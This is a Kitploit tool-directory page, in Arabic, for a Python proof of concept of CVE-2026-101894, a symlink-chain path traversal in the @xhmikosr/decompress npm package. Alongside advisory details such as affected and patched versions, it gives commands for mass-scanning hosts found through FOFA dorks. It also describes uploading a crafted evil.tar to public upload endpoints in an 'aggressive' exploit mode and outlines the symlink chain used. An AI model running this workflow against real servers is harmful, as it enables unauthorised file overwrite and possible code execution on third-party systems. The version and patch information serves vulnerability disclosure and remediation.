Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

الخلاصاتاتصالالخصوصية© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-101894 — Python PoC لـ CVE-2026-101894: اجتياز المسار عبر سلسلة الروابط الرمزية في @xhmikosr/decompress. يتضمن مختبر Node محلي، وفحص إصدار lockfile، واستغلال رفع evil.tar الجماعي. | Kitploit
أدوات/GitHubGitHub/murrez/cve-2026-101894
الاستطلاعماسحات الثغرات الأمنيةتحليل الثغرات الأمنيةالاستغلالالبرمجة النصية والأتمتةاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراقأمن سلسلة التوريد
GitHubmurrez/cve-2026-101894

CVE-2026-101894

Python PoC لـ CVE-2026-101894: اجتياز المسار عبر سلسلة الروابط الرمزية في @xhmikosr/decompress. يتضمن مختبر Node محلي، وفحص إصدار lockfile، واستغلال رفع evil.tar الجماعي.

منذ 4 أياملم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع

CVE-2026-101894 — اجتياز المسار عبر سلسلة الروابط الرمزية في @xhmikosr/decompress

إثبات مفهوم بلغة Python 3 لـ CVE-2026-101894 — استخراج الأرشيف في Node.js عبر @xhmikosr/decompress (و decompress غير المدعوم) يسمح بالقراءة/الكتابة خارج دليل الإخراج عبر سلسلة من مدخلات الروابط الرمزية. تجاوز لتقوية CVE-2026-53486. CVSS 3.1 9.1 حرج.

PoCbithttps://pocbit.org/pocs/cve-2026-101894
الفهرسhttps://pocbit.org/pocs/
الحزمة@xhmikosr/decompress (مدعومة)، decompress (kevva، غير مُرقّعة)
APIالافتراضي decompress(input, output)
CWECWE-22 اجتياز المسار، CWE-59 اتباع الروابط
مُصلَح في10.2.2 (10.x)، 11.1.4 (11.x)
GHSAGHSA-hrh2-vp3x-79xf

ملخص الثغرة (Türkçe)

decompress، عند فك أرشيفات tar/zip وما إلى ذلك إلى المجلد الهدف، يطبّق فحوصات مسار معجمية؛ لكن مع مدخلات روابط رمزية متتالية، يمكن للنواة أن تحلّ المدخلات اللاحقة خارج دليل الإخراج. بأرشيف يتحكم به المهاجم يمكنه الكتابة فوق / قراءة config أو startup script أو ملفات حساسة → سيناريو RCE (CI، حاويات، خدمات الرفع+الاستخراج).

الترقيع لـ @xhmikosr/decompress: 10.2.2 و 11.1.4. الحزمة القديمة decompress حتى الإصدار 4.2.1 من نفس الفئة ولا تتلقى ترقيعاً — انتقل إلى @xhmikosr/[email protected]+.


ما الذي يفعله إثبات المفهوم هذا

الوضعالغرض
--labيثبّت 11.1.3 داخل lab/، ويتحقق من الكتابة خارجياً عبر سلسلة الروابط الرمزية في evil.tar
--write-evil-tarيكتب أرشيف الحمولة إلى القرص (علامة POCBIT-101894-ESCAPED)
checkعلى الهدف البعيد، package.json / lockfile → هل الإصدار ≤ الخطِر؟
exploitPOST عبر سلسلة الروابط الرمزية evil.tar إلى مسارات الرفع الشائعة (كتلي)
mass--list + -j؛ hits.txt / exploited.txt

الاستغلال البعيد لا يثبت أن الخادم يفكّ الأرشيف فعلاً عبر decompress؛ قبول الرفع 2xx + بصمة إصدار ضعيفة يُعتبران exploited. للإثبات القاطع استخدم --lab.

hits.txt مقابل exploited.txt (حالة شائعة)

المرحلةما الذي تثبته
check → hits.txt/package.json أو /package-lock.json مكشوف ويحتوي على decompress ضعيف
exploit → exploited.txtواحدة على الأقل من عناوين URL العامة للرفع التي جرّبها إثبات المفهوم أعادت HTTP 2xx

في قائمة FOFA الخاصة بـ Express، 500 فحص → 2 إصابة أمر طبيعي. 2 إصابة + 0 استغلال (vulnerable_dep_no_upload_endpoint) طبيعي أيضاً: تسرّب التبعية ≠ رفع أرشيف متاح للعموم. تتطلب هذه الثغرة الاستغلال أن يقوم التطبيق بفكّ أرشيف غير موثوق عبر decompress()؛ في مواقع HID / :8088 العشوائية، غالباً لا توجد المسارات الافتراضية الثمانية إلى الأحد عشر لإثبات المفهوم.

# إثبات السلسلة (محلي)
python poc.py --lab

# الإصابات: التبعية فقط + محاولة الرفع
python poc.py --list hits.txt --mode exploit -j 2
# المتوقع: upload_ok=0, status vulnerable_dep_no_upload_endpoint

الإصدارات المتأثرة

الحزمةالمتأثرةالمُرقّعة
@xhmikosr/decompress 11.x11.0.0 – 11.1.3≥ 11.1.4
@xhmikosr/decompress 10.x< 10.2.2≥ 10.2.2
decompress (kevva)≤ 4.2.1لا يوجد — انتقل

المتطلبات

cd CVE-2026-101894
pip install -r requirements.txt

المختبر: Node.js + npm على PATH (يُفضّل Linux/macOS لسلوك استخراج الروابط الرمزية).


الاستخدام

المختبر المحلي (الإثبات الموصى به)

python poc.py --lab
python poc.py --write-evil-tar evil.tar

الفحص البعيد

python poc.py -u https://app.example --mode check
python poc.py --list targets.example.txt --mode check -j 30 --vuln-list hits.txt

الاستغلال البعيد (كتلي)

python poc.py -u https://app.example --mode exploit --aggressive
python poc.py --list hits.txt --mode exploit -j 10 --aggressive --upload-paths /api/upload,/upload
العلمالمعنى
--labإثبات استخراج Node محلي
--aggressiveالاستغلال حتى بدون lockfile ضعيف مكشوف
--upload-pathsمسارات POST مخصصة مفصولة بفواصل
--exploited-listالأهداف التي أعاد رفعها 2xx

بنية evil.tar (المفهوم)

سلسلة الروابط الرمزية (مبسّطة):

  1. a/b/c/up → ../..
  2. a/b/escape → c/up/../..
  3. esc → ..
  4. ملفات عادية …/pocbit_escape.txt مع حمولة العلامة

يطابق فئة تجاوز سلسلة الروابط الرمزية الموصوفة في ملاحظات إصدار 11.1.4 (إصلاح realpath / الاحتواء).


سير العمل الكتلي

FOFA JSON → python _format_fofa.py fofa_results_1000.json
           → fofa_results_1000.json (url), fofa_results_1000.csv, fofa_targets_1000.txt

python poc.py --list fofa_targets_1000.txt --mode check -j 40  → hits.txt
python poc.py --list fofa_results_1000.csv --mode check -j 40   # url column
python poc.py --list hits.txt --mode exploit -j 8 --aggressive  → exploited.txt

قائمة dork الخاصة بـ FOFA للرفع/zip (fofa_results_1000) أنسب لسطح الاستغلال من قائمة Express-only المكوّنة من 500؛ ومع ذلك الإصابة = lockfile + decompress ضعيف، والاستغلال = رفع 2xx.


FOFA / الاكتشاف (تطبيقات Node)

body="node_modules/@xhmikosr/decompress"
body="\"decompress\"" && body="package-lock.json"
header="X-Powered-By: Express" && body="/package.json"

(نادراً ما يكون lockfile عاماً في الإنتاج؛ غالباً ما يجد الفحص بيئات staging، ومخرجات CI، واستضافة ثابتة مُهيّأة خطأً.)


المراجع

  • PoCbit CVE-2026-101894
  • CVE.report
  • إصدار v11.1.4
  • سابق: CVE-2026-53486 / GHSA-mp2f-45pm-3cg9

قانوني

اختبر فقط الأنظمة المصرّح لك بتقييمها. لا ترفع أرشيفات ضارة إلى خدمات إنتاج تابعة لجهات خارجية.


وصف مستودع GitHub

CVE-2026-101894 PoC: @xhmikosr/decompress symlink-chain archive path traversal (bypass CVE-2026-53486). Node lab + lockfile scan + mass evil.tar upload exploit. CVSS 9.1. https://pocbit.org/pocs/cve-2026-101894
تنزيل الأداة